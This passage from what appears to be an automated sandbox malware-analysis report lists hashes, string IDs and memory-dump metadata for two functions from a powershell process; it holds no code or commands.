                                    • Opcode Fuzzy Hash: c497d4f6dd00d486c2e63a6cd493b46583d8fb16a03caf9165efa9de52eb8e4e
                                    • Instruction Fuzzy Hash: 80216BB230130A7BD734152D8944B27B7EEABC5718F24882AA409CF385ED71E84583E1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 079A17A0 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.4114104693.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_79a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'^q$4'^q$$^q$$^q
                                    • API String ID: 0-2049395529
                                    • Opcode ID: 974f8231816b0b2e8e79209a7603aed62b598de963fefa86f2206c9fab7a5fe4
                                    • Instruction ID: 1495a155268601964ea319bbcdde6f24a8c71008bf3bc1afb1fb107bbb356ef3
                                    • Opcode Fuzzy Hash: 974f8231816b0b2e8e79209a7603aed62b598de963fefa86f2206c9fab7a5fe4
                                    • Instruction Fuzzy Hash: 9601D461A4A3C9AFC32A472C1820451AFB65FC355072908DBC081CF367CD558C4A83E3
                                    Uniqueness

                                    Uniqueness Score: -1.00%